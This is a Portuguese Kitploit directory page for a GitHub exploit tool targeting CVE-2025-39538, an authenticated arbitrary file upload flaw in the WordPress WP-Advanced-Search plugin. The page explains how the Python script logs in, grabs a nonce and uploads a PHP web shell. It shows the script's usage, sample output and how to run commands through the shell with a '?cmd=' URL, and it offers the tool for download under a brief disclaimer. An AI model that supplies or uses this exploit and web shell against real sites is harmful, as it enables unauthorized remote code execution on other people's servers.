Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-39538 — WordPress WP-Advanced-Search <= 3.3.9.3 - Vulnerabilidade de Upload Arbitrário de Arquivos | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-39538
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2025-39538

CVE-2025-39538

WordPress WP-Advanced-Search <= 3.3.9.3 - Vulnerabilidade de Upload Arbitrário de Arquivos

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛡️ CVE-2025-39538 - WordPress WP-Advanced-Search <= 3.3.9.3 Upload Arbitrário de Arquivos

CVE-2025-39538
Publicado: 2025-04-16
Tipo de Vulnerabilidade: Upload Arbitrário de Arquivos (Upload sem Restrições de Arquivo com Tipo Perigoso)
Plugin Afetado: WP-Advanced-Search por Mathieu Chartier
Versões Afetadas: Todas as versões até e incluindo 3.3.9.3

Essa vulnerabilidade permite que um atacante autenticado envie um arquivo PHP malicioso (como um web shell) para o servidor usando a funcionalidade de importação fornecida pelo plugin. O arquivo enviado é colocado no diretório de uploads do WordPress e pode levar à execução remota de código.

🧱 Caminho de upload:

root@kitploit:~
wp-content/uploads/2025/04/

⚙️ Sobre o Script de Exploit

Este script Python realiza as seguintes ações:

  1. Faz login no site WordPress usando as credenciais fornecidas.
  2. Extrai o wp_advanced_search_up_nonce necessário da página de administração de importação/exportação.
  3. Envia um web shell (arquivo PHP) através de uma requisição POST manipulada.

🚀 Uso

root@kitploit:~
uso: a.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-39538 - WP Advanced Search Upload Arbitrário de Arquivos Exploit # Por Nxploited (Khaled Alenazi)

opções:
  -h, --help            mostra esta mensagem de ajuda e sai
  -u, --url URL         URL do WordPress alvo (ex.: http://127.0.0.1/wordpress)
  -un, --username USERNAME
                        Nome de usuário do WordPress
  -p, --password PASSWORD
                        Senha do WordPress

🖥️ Exemplo de Saída:

root@kitploit:~
[*] Tentando login...
[+] Login bem-sucedido.
[*] Obtendo nonce da página de importação/exportação...
[+] Nonce extraído: 2140855687
[*] Tentando enviar shell...
[+] Arquivo enviado (verifique wp-content/uploads ou diretório temporário).

🐚 Usando o Shell Enviado

Após o upload, você pode acessar seu shell assim:

root@kitploit:~
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami

Substitua whoami por qualquer comando Linux que deseje executar, por exemplo:

  • id — mostra o ID do usuário atual.
  • pwd — mostra o diretório atual.
  • ls — lista arquivos.

⚠️ Aviso Legal


Esta ferramenta é destinada apenas para fins educacionais e testes de segurança autorizados.
O autor não se responsabiliza por qualquer uso indevido ou dano causado por este script.


Por: Nxploited | Khaled Alenazi

Baixar ferramenta